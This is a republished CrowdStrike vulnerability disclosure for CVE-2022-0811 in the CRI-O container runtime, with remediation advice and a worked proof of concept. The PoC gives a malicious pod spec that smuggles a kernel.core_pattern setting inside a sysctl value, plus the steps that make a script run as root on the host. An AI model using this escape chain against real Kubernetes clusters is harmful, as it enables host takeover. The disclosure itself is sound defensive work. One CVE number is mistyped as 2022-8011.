cr8escape: New Vulnerability in CRI-O Container Engine Discovered by CrowdStrike (CVE-2022-0811)

Published 06/03/2022

This blog was originally published by CrowdStrike on March 15, 2022.

Written by John Walker – Manoj Ahuje, CrowdStrike.

CrowdStrike cloud security researchers discovered a new vulnerability (dubbed “cr8escape” and tracked as CVE-2022-0811) in the Kubernetes container engine CRI-O.
CrowdStrike disclosed the vulnerability to Kubernetes, which worked with CRI-O to issue a patch that was released today.
It is recommended that CRI-O users patch immediately.

Summary

CrowdStrike’s Cloud Threat Research team discovered a new vulnerability (CVE-2022-0811) in CRI-O (a container runtime engine underpinning Kubernetes). Dubbed “cr8escape,” when invoked, an attacker could escape from a Kubernetes container and gain root access to the host and be able to move anywhere in the cluster. Invocation of CVE-2022-0811 can allow an attacker to perform a variety of actions on objectives, including execution of malware, exfiltration of data and lateral movement across pods.

CrowdStrike disclosed the vulnerability to Kubernetes, which worked with CRI-O to issue a patch that was released today. The CVE score is 8.8 (High) and the potential impact is widespread, as many software and platforms use CRI-O by default. It is recommended that CRI-O users patch immediately.

Kubernetes uses a container runtime like CRI-O or Docker to safely share each node’s kernel and resources with the various containerized applications running on it. The Linux kernel accepts runtime parameters that control its behavior. Some parameters are namespaced and can therefore be set in a single container without impacting the system at large. Kubernetes and the container runtimes it drives allow pods to update these “safe” kernel settings while blocking access to others.

CrowdStrike’s Cloud Threat Research team discovered a flaw introduced in CRI-O version 1.19 that allows an attacker to bypass these safeguards and set arbitrary kernel parameters on the host. As a result of CVE-2022-0811, anyone with rights to deploy a pod on a Kubernetes cluster that uses the CRI-O runtime can abuse the “kernel.core_pattern” parameter to achieve container escape and arbitrary code execution as root on any node in the cluster.

Impact

Directly Affected Software

CRI-O version 1.19+

To determine if a host is affected: run crio —version

Indirectly Affected Software and Platforms

While the vulnerability is in CRI-O, software and platforms that depend on it are also likely to be vulnerable, including:

OpenShift 4+
Oracle Container Engine for Kubernetes

Remediation

At the Kubernetes level:

Ideal: Use policies to block pods that contain sysctl settings with “+” or “=” in their value.
Less ideal alternative: Use the PodSecurityPolicy forbiddenSysctls field to block all sysctls (it’s necessary to block all sysctls as the malicious setting is smuggled in a value).

At the CRI-O level:

Upgrade to a patched version of CRI-O.
Set pinns_path in crio.conf to point to a pinns wrapper that strips the “-s” option before invoking the real pinns. This will prevent pods from updating any kernel parameters, including sensitive ones.
- Pinns, typically found at /usr/bin/pinns, is the utility CRI-O uses to set kernel parameters.
Downgrade to CRI-O version 1.18 or earlier. (Not recommended in most cases.)

Vulnerability Details

Starting with this commit, CRI-O uses the pinns utility to set kernel options for a pod. Pinns is most commonly invoked like this:
pinns -s kernel_parameter1=value1+kernel_parameter2=value2
Due to the addition of sysctl support in version 1.19, pinns will now blindly set any kernel parameters it’s passed without validation.

The following function converts the map of sysctl settings passed to CRI-O into a pinns argument. Like pinns, it does not validate the settings.

func getSysctlForPinns(sysctls map[string]string) string {
 // this assumes there's no sysctl with a `+` in it
 const pinnsSysctlDelim = "+"
 g := new(bytes.Buffer)
 for key, value := range sysctls {
  fmt.Fprintf(g, "'%s=%s'%s", key, value, pinnsSysctlDelim)
 }
 return strings.TrimSuffix(g.String(), pinnsSysctlDelim)
}

Validation does occur before this function is invoked. However, note that the value is not checked or sanitized. As long as the sysctl key is valid, it will be processed as is.

func (s *Sysctl) Validate(hostNet, hostIPC bool) error {
 nsErrorFmt := "%q not allowed with host %s enabled"
 if ns, found := namespaces[s.Key()]; found {
  if ns == IpcNamespace && hostIPC {
   return errors.Errorf(nsErrorFmt, s.Key(), ns)
  }
  return nil
 }
 for p, ns := range prefixNamespaces {
  if strings.HasPrefix(s.Key(), p) {
   if ns == IpcNamespace && hostIPC {
    return errors.Errorf(nsErrorFmt, s.Key(), ns)
   }
   if ns == NetNamespace && hostNet {
    return errors.Errorf(nsErrorFmt, s.Key(), ns)
   }
   return nil
  }
 }
 return errors.Errorf("%s not whitelisted", s.Key())
}

The result: A malicious user can pass in sysctl values with + and = characters allowing extra kernel settings to be set through pinns.

Proof of Concept: Leveraging CVE-2022-0811 to Compromise Kubernetes

Overview

This proof of concept (POC) uses a malicious PodSpec to set the kernel.core_pattern kernel parameter, which specifies how the kernel should react to a core dump. In this case, we’ll tell it to execute a binary hosted in another pod. That binary will be run as root outside of any container. Finally, we’ll trigger a core dump causing the kernel to invoke the malicious executable.

Reproduction Environment for POC

Minikube cluster created via minikube start --kubernetes-version=v1.23.3 --driver=vmware --container-runtime=crio running:
- Kubernetes v1.23.3
- CRI-O 1.22.0 (Later versions are vulnerable as well; this just happens to be the version of CRI-O Minikube installs.)

Steps

Startup Pod to Host Malicious Executable

This pod will host an executable that the kernel will invoke after a core dump. It will also be used to trigger a core dump.

❯ cat ./malicious-script-host.yaml
apiVersion: v1
kind: Pod
metadata:
  name: malicious-script-host
spec:
  containers:
  - name: alpine
    image: alpine:latest
    command: ["tail", "-f", "/dev/null"]
 
❯ kubectl create -f ./malicious-script-host.yaml
pod/malicious-script-host created

Determine Root Path From Host Mount Namespace

Ultimately the kernel will be invoking a script in this pod in response to a core dump. The kernel will be acting in the host mount namespace, so we need to determine the path to the container filesystem from this namespace.

❯ kubectl exec -it malicious-script-host -- /bin/sh
/ # mount
overlay on / type overlay (rw,relatime,lowerdir=/var/lib/containers/storage/overlay/l/VSOA5NIR3Y3ACHBH662FOSL4J2,
upperdir=/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/
diff,workdir=/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/work)
…

/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff is the path to the root of the container from the perspective of the kernel.

Create a Malicious Script to Invoke on Core Dump

Within our malicious script host pod:

/ # ls -l /malicious.sh
-rwxr-xr-x    1 root     root           256 Feb 23 14:00 /malicious.sh
 
/ # cat /malicious.sh
#!/bin/sh
date >> /var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/output
whoami >> /var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/output
hostname >>  /var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/output
 
# important – ensures file is readable within container
/ # touch /output 
/ # cat /output

We now have a malicious script setup and we know its path in the host mount namespace.

Use Second Pod to Point Core Pattern to Malicious Script

Next is our attempt to create a second pod. Creation will stall, but as a result of the attempt, CRI-O daemon will update the value of the kernel.core_pattern setting, which controls what the kernel does in response to core dumps. In this case, we’ll tell the kernel to send the core dump to our malicious script.

NOTE: You must ensure this pod runs on the same node as the malicious script pod. There are multiple ways to do this depending on the exact cluster setup. A primitive, brute force method is to spin it up as a daemonset, which will update core_pattern for every node in the cluster.

❯ cat ./sysctl-set.yaml
apiVersion: v1
kind: Pod
metadata:
  name: sysctl-set
spec:
  securityContext:
   sysctls:
   - name: kernel.shm_rmid_forced
     value: "1+kernel.core_pattern=|/var/lib/containers/storage/overlay/
     3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/malicious.sh #"
  containers:
  - name: alpine
    image: alpine:latest
    command: ["tail", "-f", "/dev/null"]
 
❯ kubectl create -f ./sysctl-set.yaml
pod/sysctl-set created
 
❯ kubectl get pods
NAME                    READY   STATUS              RESTARTS   AGE
malicious-script-host   1/1     Running             0          14m
sysctl-set              0/1     ContainerCreating   0          68s
 
❯ kubectl exec -it malicious-script-host -- /bin/sh
/ # cat /proc/sys/kernel/core_pattern
|/var/lib/containers/storage/overlay/3ef1281bce79865599f673b476957be73f994d17c15109d2b6a426711cf753e6/diff/malicious.sh #'

While the sysctl-set pod did not start, it successfully updated the node-wide core_pattern to point into our malicious-script-host container.

This works because both Kubernetes and CRI-O sysctl validation logic believe the user is updating only the safe kernel parameter “kernel.shm_rmid_forced.” When CRI-O actually applies this setting, though, its parser will expand it into two kernel parameter updates:

kernel.shm_rmid_forced=1
kernel.core_pattern=|<path to malicious script> #’

This second option has not been validated or sanitized in any way. (NOTE: The trailing # is to ignore the single quote CRI-O adds to the end of the value.)

Trigger Core Dump

We need to trigger a core dump to cause the kernel to execute our malicious core dump handler.

First enable core dumps:

❯ kubectl exec -it malicious-script-host -- /bin/sh
/ # ulimit -c unlimited
/ # ulimit -c
unlimited

Now trigger one:

/ # tail -f /dev/null &
/ # ps
PID   USER     TIME  COMMAND
    1 root      0:00 tail -f /dev/null
   34 root      0:00 /bin/sh
   42 root      0:00 tail -f /dev/null
   43 root      0:00 ps
/ # kill -SIGSEGV 42
/ #
[1]+  Segmentation fault (core dumped) tail -f /dev/null

Verify Malicious Script Ran

❯ kubectl exec -it malicious-script-host -- /bin/sh
/ # cat /output
Wed Feb 23 14:20:07 UTC 2022
root
minikube

This script was invoked by the kernel outside of the container namespace with root privileges. A real attacker could, as an example, run a reverse shell and gain full control of the node.

Notes

Kubernetes is not necessary to invoke CVE-2022-8011. An attacker on a machine with CRI-O installed can use it to set kernel parameters all by itself. We used Kubernetes in this POC to better illustrate the potential impact of the problem and to more closely simulate how this would likely be used in the wild.

Read more about how to block vulnerabilities before they’re exploited: How to Protect Cloud Workloads from Zero-day Vulnerabilities

Common Vulnerability and Exposures Vulnerabilities